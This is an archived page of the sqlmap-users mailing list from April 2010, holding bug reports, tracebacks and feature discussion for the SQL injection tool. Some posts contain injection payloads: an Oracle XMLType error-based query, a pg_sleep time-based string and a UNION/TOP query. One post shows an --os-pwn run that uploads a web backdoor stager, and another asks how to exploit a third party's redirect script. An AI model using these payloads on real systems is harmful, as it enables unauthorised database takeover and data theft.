sqlmap-users Mailing List for sqlmap (Page 128)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Ethan R. <eth...@gm...> - 2010-04-20 07:20:21
|
[root]# ./sqlmap.py -u http://192.168.1.7/insecure.php --method=POST --data="name=bobby&submit=Search" -p name --os-pwn sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 02:10:57 [02:10:57] [WARNING] you did not provide the local path where Metasploit Framework 3 is installed [02:10:57] [WARNING] sqlmap is going to look for Metasploit Framework 3 installation into the environment paths [02:10:57] [INFO] Metasploit Framework 3 has been found installed in the '/usr/local/bin' path [02:10:57] [INFO] using '/home/ethan/installs/sqlmap/output/ 192.168.1.7/session' as session file [02:10:57] [INFO] testing connection to the target url [02:10:58] [INFO] testing if the url is stable, wait a few seconds [02:10:59] [INFO] url is stable [02:10:59] [INFO] testing sql injection on POST parameter 'name' with 0 parenthesis [02:11:00] [INFO] testing unescaped numeric injection on POST parameter 'name' [02:11:00] [INFO] POST parameter 'name' is not unescaped numeric injectable [02:11:00] [INFO] testing single quoted string injection on POST parameter 'name' [02:11:00] [INFO] confirming single quoted string injection on POST parameter 'name' [02:11:00] [INFO] POST parameter 'name' is single quoted string injectable with 0 parenthesis [02:11:00] [INFO] testing for parenthesis on injectable parameter [02:11:01] [INFO] the injectable parameter requires 0 parenthesis [02:11:01] [INFO] testing MySQL [02:11:01] [INFO] confirming MySQL [02:11:02] [INFO] retrieved: 4 [02:11:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL >= 5.0.0 [02:11:03] [INFO] testing stacked queries support on parameter 'name' [02:11:03] [INFO] detecting back-end DBMS version from its banner [02:11:03] [INFO] retrieved: 5.1.41 [02:11:15] [WARNING] the web application does not support stacked queries on parameter 'name' [02:11:15] [INFO] going to use a web backdoor to execute the payload stager [02:11:15] [INFO] fingerprinting the back-end DBMS operating system [02:11:15] [INFO] retrieved: \ [02:11:18] [INFO] the back-end DBMS operating system is Windows [02:11:18] [INFO] trying to upload the uploader agent which web application language does the web server support? [1] ASP (default) [2] PHP [3] JSP > 2 [02:11:21] [WARNING] unable to retrieve the web server document root please provide the web server document root [C:/xampp/htdocs/]: [02:11:22] [INFO] retrieved web server full paths: 'C:\xampp\htdocs\insecure.php' please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]: [02:11:23] [ERROR] unhandled exception in sqlmap/0.8, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.8 Python version: 2.5.2 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 77, in main start() File "/home/ethan/installs/sqlmap/lib/controller/controller.py", line 259, in start action() File "/home/ethan/installs/sqlmap/lib/controller/action.py", line 144, in action conf.dbmsHandler.osPwn() File "/home/ethan/installs/sqlmap/plugins/generic/takeover.py", line 169, in osPwn self.initEnv(web=web) File "/home/ethan/installs/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv self.webInit() File "/home/ethan/installs/sqlmap/lib/takeover/web.py", line 189, in webInit uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) File "/home/ethan/installs/sqlmap/lib/request/connect.py", line 126, in getPage conn = urllib2.urlopen(req) File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen return _opener.open(url, data) File "/usr/lib/python2.5/urllib2.py", line 381, in open response = self._open(req, data) File "/usr/lib/python2.5/urllib2.py", line 399, in _open '_open', req) File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain result = func(*args) File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open return self.do_open(httplib.HTTPConnection, req) File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open h = http_class(host) # will parse host:port File "/usr/lib/python2.5/httplib.py", line 639, in __init__ self._set_hostport(host, port) File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) InvalidURL: nonnumeric port: '' [*] shutting down at: 02:11:23 |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-19 11:52:04
|
Hi Vitaly, sqlmap does not support error-based SQL injection yet: This will come in the upcoming months with the new design and rewrite from scratch of the detection engine. Support to exploit injection points in Oracle Application Server is another task, not planned at the moment though. If you are happy to help, feel free to provide us with patch files to support OAP. Cheers, Bernardo On Sun, Apr 18, 2010 at 17:45, <d...@ds...> wrote: > > First, Sorry for my bad English I'm from Romania > > > > I use sqlmap to test web app+oracle db. > > Maybe will be done to use for oracle blind injetion technique like this > > > > http://example.com/app.jsp?id=21 and(1)=(select > > upper(XMLType(chr(60)||chr(58)||chr(58)||(select > > replace(banner,chr(32),chr(58)) from sys.v_$version where > > rownum=1)||chr(62))) from dual)-- > > > > it work only if print error is on, but technique will be useful i think. > > if need i cant post a real link with example. > > I write a small tool in python to use this technique but use a lot of > > utilities are not comfortable really want to see this technique in sqlmap > > :) > > if you need some form of assistance with this task would be happy to assist > > you > > > > two, Implement support of Oracle Application server to sqlmap :) > > Sqlmap dont know how to work with it, but exist more than one technique to > > exploit sql injection for Oracle Application Server > > > > if you're busy with other matters I would take to embed this technique in > > sqlmap with your help :) > > > > > > ____________________________________________________________________________________________________________________________________________________ > > Vitaly Turenko aka DSU (d[at]dsu.com.ua) > > My Oracle security blog http://dsu.com.ua/ > > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: <d...@ds...> - 2010-04-18 17:12:43
|
First, Sorry for my bad English I'm from Romania I use sqlmap to test web app+oracle db. Maybe will be done to use for oracle blind injetion technique like this http://example.com/app.jsp?id=21 and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)-- it work only if print error is on, but technique will be useful i think. if need i cant post a real link with example. I write a small tool in python to use this technique but use a lot of utilities are not comfortable really want to see this technique in sqlmap :) if you need some form of assistance with this task would be happy to assist you two, Implement support of Oracle Application server to sqlmap :) Sqlmap dont know how to work with it, but exist more than one technique to exploit sql injection for Oracle Application Server if you're busy with other matters I would take to embed this technique in sqlmap with your help :) ____________________________________________________________________________________________________________________________________________________ Vitaly Turenko aka DSU (d[at]dsu.com.ua) My Oracle security blog http://dsu.com.ua/ |
From: Miroslav S. <mir...@gm...> - 2010-04-15 09:36:53
|
Hi. Implemented by your request :). Try the latest SVN version. Kind regards. On Thu, Apr 15, 2010 at 12:07 AM, Ole Rasmussen <ol...@gm...> wrote: > Many DBs are often designed such that table/db names are coherent. > Something often seen is that every table name is prefixed with some > string describing somewhat the relations in the table. An example: > > DB table1: > data_catalogs > data_catalogs_log > data_catalyst > data_emails > data_emails_old > > I don't know if SqlMap takes proximity of the last found table names > into account when enumerating - if it doesn't that could greatly speed > up enumerating table names like in the above example. > When SqlMap acquires the name 'data_catalogs' it could start the next > query by checking if the first letter is 'd' (which it is in the above > example), circumventing the need to do the binary relation search. If > the letter isn't 'd' then all we lost is adding a single query, but we > save a lot of queries if it is. Next time (if the letter was 'd') it > would check if the letter was 'a', then 't' and so on. > This would of course only work if the data is fetched in sorted order, > but I haven't encountered a case where it isn't yet - I guess it must > be sorted in INFORMATION tables in MySql? If it is then I think this > only underlines why you should implement the suggested proximity > queries. It might also be advantageous to exploit that the information > is sorted even without proximity queries; if we just received a table > name starting with 'd' then we know the next table name starts with at > least 'd' as well - I'm not sure if SqlMap already exploits this? > > Regards, > Ole > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: Ole R. <ol...@gm...> - 2010-04-14 22:07:51
|
Many DBs are often designed such that table/db names are coherent. Something often seen is that every table name is prefixed with some string describing somewhat the relations in the table. An example: DB table1: data_catalogs data_catalogs_log data_catalyst data_emails data_emails_old I don't know if SqlMap takes proximity of the last found table names into account when enumerating - if it doesn't that could greatly speed up enumerating table names like in the above example. When SqlMap acquires the name 'data_catalogs' it could start the next query by checking if the first letter is 'd' (which it is in the above example), circumventing the need to do the binary relation search. If the letter isn't 'd' then all we lost is adding a single query, but we save a lot of queries if it is. Next time (if the letter was 'd') it would check if the letter was 'a', then 't' and so on. This would of course only work if the data is fetched in sorted order, but I haven't encountered a case where it isn't yet - I guess it must be sorted in INFORMATION tables in MySql? If it is then I think this only underlines why you should implement the suggested proximity queries. It might also be advantageous to exploit that the information is sorted even without proximity queries; if we just received a table name starting with 'd' then we know the next table name starts with at least 'd' as well - I'm not sure if SqlMap already exploits this? Regards, Ole |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-14 08:15:31
|
Get the latest version from subversion. We committed recently an early support for Access. Bernardo On Wed, Apr 14, 2010 at 01:39, Pagera <pag...@gm...> wrote: > hello > is there any access support in sqlmap > > cuz it show this message: > Support for this DBMS will be implemented if you ask, just drop us an email > > thankx > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Pagera <pag...@gm...> - 2010-04-13 23:35:40
|
hello is there any access support in sqlmap cuz it show this message: Support for this DBMS will be implemented if you ask, just drop us an email thankx |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-09 15:51:26
|
Fixed wherever possible and committed. Thanks for reporting. Bernardo On Fri, Apr 2, 2010 at 09:36, Daliev Ilya <da...@ya...> wrote: > Hello SQLMAP users. > > Version: sqlmap/0.8-rc7 > When using partial (single row) inband sql injection with mssql sqlmap uses > construction like this > > field1=field1_value union all select top 1 some_field from some_table where > some_field not in (select top N some_field from some_table) > > Microsoft says that unordered result set with top clause are nondeterministic. > Even more, results obtained with different N are the same. May be it's better > to use skip/limit clause or something like this > > field1=field1_value union all select top 1 some_field from some_table where > some_field not in (select top N some_field from some_table order by 1) and > some_field in (select top N+1 some_field from some_table order by 1) > > > Regards, Daliev Ilya > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Miroslav S. <mir...@gm...> - 2010-04-09 10:40:27
|
Thank you for another report :) Fixed and committed. Kind regards. On Fri, Apr 9, 2010 at 12:24 PM, shi...@gm... <shi...@gm...> wrote: > [12:22:23] [INFO] testing for parenthesis on injectable parameter > [12:22:23] [INFO] testing Microsoft SQL Server > [12:22:28] [INFO] confirming Microsoft SQL Server > [12:22:40] [INFO] the back-end DBMS is Microsoft SQL Server > > [12:22:40] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: > sqlmap version: 0.9-dev > Python version: 2.6.1 > Operating system: darwin > Traceback (most recent call last): > File "./sqlmap.py", line 78, in main > start() > File "/Users/hagbart/source/sqlmap_svn/lib/controller/controller.py", line 267, in start > action() > File "/Users/hagbart/source/sqlmap_svn/lib/controller/action.py", line 68, in action > print "%s\n" % conf.dbmsHandler.getFingerprint() > File "/Users/hagbart/source/sqlmap_svn/plugins/dbms/mssqlserver/fingerprint.py", line 58, in getFingerprint > actVer = formatDBMSfp() > File "/Users/hagbart/source/sqlmap_svn/lib/core/common.py", line 139, in formatDBMSfp > if ( not versions or versions == [None] ) and kb.dbmsVersion[0] != "Unknown": > TypeError: 'NoneType' object is unsubscriptable > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: <shi...@gm...> - 2010-04-09 10:25:06
|
[12:22:23] [INFO] testing for parenthesis on injectable parameter [12:22:23] [INFO] testing Microsoft SQL Server [12:22:28] [INFO] confirming Microsoft SQL Server [12:22:40] [INFO] the back-end DBMS is Microsoft SQL Server [12:22:40] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.9-dev Python version: 2.6.1 Operating system: darwin Traceback (most recent call last): File "./sqlmap.py", line 78, in main start() File "/Users/hagbart/source/sqlmap_svn/lib/controller/controller.py", line 267, in start action() File "/Users/hagbart/source/sqlmap_svn/lib/controller/action.py", line 68, in action print "%s\n" % conf.dbmsHandler.getFingerprint() File "/Users/hagbart/source/sqlmap_svn/plugins/dbms/mssqlserver/fingerprint.py", line 58, in getFingerprint actVer = formatDBMSfp() File "/Users/hagbart/source/sqlmap_svn/lib/core/common.py", line 139, in formatDBMSfp if ( not versions or versions == [None] ) and kb.dbmsVersion[0] != "Unknown": TypeError: 'NoneType' object is unsubscriptable |
From: Miroslav S. <mir...@gm...> - 2010-04-09 10:16:48
|
Thank you for your report. Now it should be fixed and committed. Kind regards. On Fri, Apr 9, 2010 at 11:52 AM, shi...@gm... <shi...@gm...> wrote: > xxxxxx01:sqlmap_svn xxxxxxxt$ python sqlmap.py --update > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 11:50:46 > > [11:50:46] [INFO] updating sqlmap to latest development version from the subversion repository > [11:50:46] [INFO] update in progress . done > [11:50:47] [INFO] updated to the latest revision 1550 > [11:50:47] [INFO] updating Microsoft SQL Server XML versions file > > [11:50:50] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: > sqlmap version: 0.9-dev > Python version: 2.6.1 > Operating system: darwin > Traceback (most recent call last): > File "sqlmap.py", line 77, in main > init(cmdLineOptions) > File "/Users/hagbart/source/sqlmap_svn/lib/core/option.py", line 1074, in init > update() > File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 261, in update > __updateMSSQLXML() > File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 57, in __updateMSSQLXML > mssqlVersionsHtmlString, _ = Request.getPage(url=MSSQL_VERSIONS_URL, direct=True) > File "/Users/hagbart/source/sqlmap_svn/lib/request/connect.py", line 161, in getPage > for _, cookie in enumerate(conf.cj): > TypeError: 'NoneType' object is not iterable > > [*] shutting down at: 11:50:51 > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: <shi...@gm...> - 2010-04-09 09:52:51
|
xxxxxx01:sqlmap_svn xxxxxxxt$ python sqlmap.py --update sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:50:46 [11:50:46] [INFO] updating sqlmap to latest development version from the subversion repository [11:50:46] [INFO] update in progress . done [11:50:47] [INFO] updated to the latest revision 1550 [11:50:47] [INFO] updating Microsoft SQL Server XML versions file [11:50:50] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.9-dev Python version: 2.6.1 Operating system: darwin Traceback (most recent call last): File "sqlmap.py", line 77, in main init(cmdLineOptions) File "/Users/hagbart/source/sqlmap_svn/lib/core/option.py", line 1074, in init update() File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 261, in update __updateMSSQLXML() File "/Users/hagbart/source/sqlmap_svn/lib/core/update.py", line 57, in __updateMSSQLXML mssqlVersionsHtmlString, _ = Request.getPage(url=MSSQL_VERSIONS_URL, direct=True) File "/Users/hagbart/source/sqlmap_svn/lib/request/connect.py", line 161, in getPage for _, cookie in enumerate(conf.cj): TypeError: 'NoneType' object is not iterable [*] shutting down at: 11:50:51 |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-07 09:16:52
|
Steve, We do not plan to release any new version in the short term. I suggest you to use the latest development version from subversion repository. Bernardo On Wed, Apr 7, 2010 at 03:18, Steve Pinkham <ste...@gm...> wrote: > There seem to be a number of bugfixes since the last release version. > Is there a bugfix release planned for the near future, or should I > include the SVN version of sqlmap in the next version of our Web > Security Dojo project? > > Steve > -- > | Steven Pinkham, Security Researcher | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Steve P. <ste...@gm...> - 2010-04-07 02:18:13
|
There seem to be a number of bugfixes since the last release version. Is there a bugfix release planned for the near future, or should I include the SVN version of sqlmap in the next version of our Web Security Dojo project? Steve -- | Steven Pinkham, Security Researcher | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-06 11:26:55
|
James, If the web server returns a HTTP return code 301 or 302, sqlmap (as of 0.9-dev) asks the user if he wants to follow the redirection or not (assuming the web server sent a Location or URI header in the HTTP response). In your case it does. "page not found" error message is displayed only when the HTTP return code is 404 so the redirected page might return such code. Can you please provide us with the -v 5 output and/or a pcap of the traffic? If it's a sensible site, do so privately please. Regards, Bernardo On Mon, Apr 5, 2010 at 22:22, <ja...@ev...> wrote: > > Hello, > > I'm exploiting a redirection script.. > http://site.com/redirect.asp?sid=7321. > > When i feed it a ' at the end of the URL i get.. > > Microsoft OLE DB Provider for SQL Server error '80040e14' > > Unclosed quotation mark after the character string ''. > > /redirect.asp, line 23 > > Looks good, right? No. > > [jl@rashid-abdul-abmerhenijan sqlmap-dev]$ ./sqlmap -u > "http://site/redirect.asp?sid=7321" -v 5 > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 17:20:07 > > [17:20:07] [DEBUG] initializing the configuration > [17:20:07] [DEBUG] initializing the knowledge base > [17:20:07] [DEBUG] cleaning up configuration parameters > [17:20:07] [DEBUG] setting the HTTP timeout > [17:20:07] [DEBUG] setting the HTTP method to GET > [17:20:07] [DEBUG] creating HTTP requests opener object > [17:20:07] [DEBUG] parsing XML queries file > [17:20:07] [INFO] using '/home/jl/sqlmap-dev/output/site/session' as > session file > [17:20:07] [INFO] testing connection to the target url > [17:20:07] [ERROR] page not found > > [*] shutting down at: 17:20:07 > > Is there some way to get SQLmap to exploit this? > > Here is the raw output > > Escape character is '^]'. > GET /redirect.asp?sid=7321 HTTP/1.0 > > HTTP/1.1 302 Object moved > Connection: close > Date: Mon, 05 Apr 2010 21:18:52 GMT > Server: Microsoft-IIS/6.0 > X-Powered-By: ASP.NET > Location: censored_url.com/whatever_data > Content-Length: 175 > Content-Type: text/html > Set-Cookie: source=; path=/ > Set-Cookie: sid=220216217218; path=/ > Cache-control: private > > <head><title>Object moved</title></head> > <body><h1>Object Moved</h1>This object may be found <a HREF="censored for > privacy">here</a>.</body> > Connection closed by foreign host. > > Using latest SQLMap SVN -- Btw, good work on the MS Access support!@! > > -James @ Ev6.NET > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-06 11:16:46
|
Hi, If you have ever been the first to report a bug or have suggested a feature that has been implemented or scheduled (when we wrote you so) and your name is not in the contributors file[1] you can report it privately to us[2] and we will adapt accordingly. If, for any reason, you want your name to be removed from the file, you can as well drop us an email. [1] http://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/THANKS [2] http://sqlmap.sourceforge.net/#author Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2010-04-06 08:55:14
|
Hi David, On Mon, Apr 5, 2010 at 21:38, David Guimaraes <sk...@gm...> wrote: > ... > I've tried several ways to circumvent this form to gain unauthorized access, > but i not get success in the handling of sql injection. However, nessus > reported that the field is vulnerable to Time-Based Sql Injection by > manipulating the parameter j_username with the following query: > > j_username = ';%20select%20pg_sleep%20(10)-- > > Tested the failure, I noticed that you can only make a time-based blind sql > injection. But even passing the parameter --time-test for the sqlmap, and > setting the option in sqlmap.conf timetest to true, does not make sqlmap > test time-based sql inj. sqlmap at first has to detect a boolean-based blind sql injection to be able to proceed testing for time based blind sql injection (with, --time-test, yes). This is a design flaw of the tool and will be fixed in the next months while we will be working on the refactoring of the detection engine. At the moment you can't use sqlmap to exploit this kind of sql injection. By the way, this is detailed in the user's manual[1]. [1] http://sqlmap.sourceforge.net/doc/README.html#ss5.5 Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Miroslav S. <mir...@gm...> - 2010-04-05 23:10:16
|
Hi. Fixed and commited. Thank you for your report. Kind regards. On Mon, Apr 5, 2010 at 9:52 PM, David Guimaraes <sk...@gm...> wrote: > The problem happens with any dbms i pass. Oracle, MySQL, Postgre,etc.. > > # ./sqlmap.py -u "http://xxx" --data "xxx" -p xxx -v 2 --time-test --dbms > oracle > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 16:49:25 > > [16:49:25] [DEBUG] initializing the configuration > [16:49:25] [DEBUG] initializing the knowledge base > [16:49:25] [DEBUG] cleaning up configuration parameters > [16:49:25] [DEBUG] setting the HTTP timeout > [16:49:25] [DEBUG] setting the HTTP method to GET > [16:49:25] [DEBUG] creating HTTP requests opener object > [16:49:25] [DEBUG] forcing back-end DBMS to user defined value > > [16:49:25] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the > command line and the following text and send by e-mail to > sql...@li.... The developer will fix it as soon as > possible: > sqlmap version: 0.9-dev > Python version: 2.5.2 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 77, in main > init(cmdLineOptions) > File "/home/skys/sqlmap-dev/lib/core/option.py", line 1074, in init > __setDBMS() > File "/home/skys/sqlmap-dev/lib/core/option.py", line 503, in __setDBMS > "|".join([alias for alias in FIREBIRD_ALIASES])) > TypeError: not all arguments converted during string formatting > > [*] shutting down at: 16:49:25 > > # svn info > Path: . > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap > Repository Root: https://svn.sqlmap.org/sqlmap > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb > Revision: 1536 > Node Kind: directory > Schedule: normal > Last Changed Author: stamparm > Last Changed Rev: 1536 > Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010) > > > -- > David Gomes Guimarães > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
From: <ja...@ev...> - 2010-04-05 21:40:13
|
Hello, I'm exploiting a redirection script.. http://site.com/redirect.asp?sid=7321. When i feed it a ' at the end of the URL i get.. Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark after the character string ''. /redirect.asp, line 23 Looks good, right? No. [jl@rashid-abdul-abmerhenijan sqlmap-dev]$ ./sqlmap -u "http://site/redirect.asp?sid=7321" -v 5 sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 17:20:07 [17:20:07] [DEBUG] initializing the configuration [17:20:07] [DEBUG] initializing the knowledge base [17:20:07] [DEBUG] cleaning up configuration parameters [17:20:07] [DEBUG] setting the HTTP timeout [17:20:07] [DEBUG] setting the HTTP method to GET [17:20:07] [DEBUG] creating HTTP requests opener object [17:20:07] [DEBUG] parsing XML queries file [17:20:07] [INFO] using '/home/jl/sqlmap-dev/output/site/session' as session file [17:20:07] [INFO] testing connection to the target url [17:20:07] [ERROR] page not found [*] shutting down at: 17:20:07 Is there some way to get SQLmap to exploit this? Here is the raw output Escape character is '^]'. GET /redirect.asp?sid=7321 HTTP/1.0 HTTP/1.1 302 Object moved Connection: close Date: Mon, 05 Apr 2010 21:18:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: censored_url.com/whatever_data Content-Length: 175 Content-Type: text/html Set-Cookie: source=; path=/ Set-Cookie: sid=220216217218; path=/ Cache-control: private <head><title>Object moved</title></head> 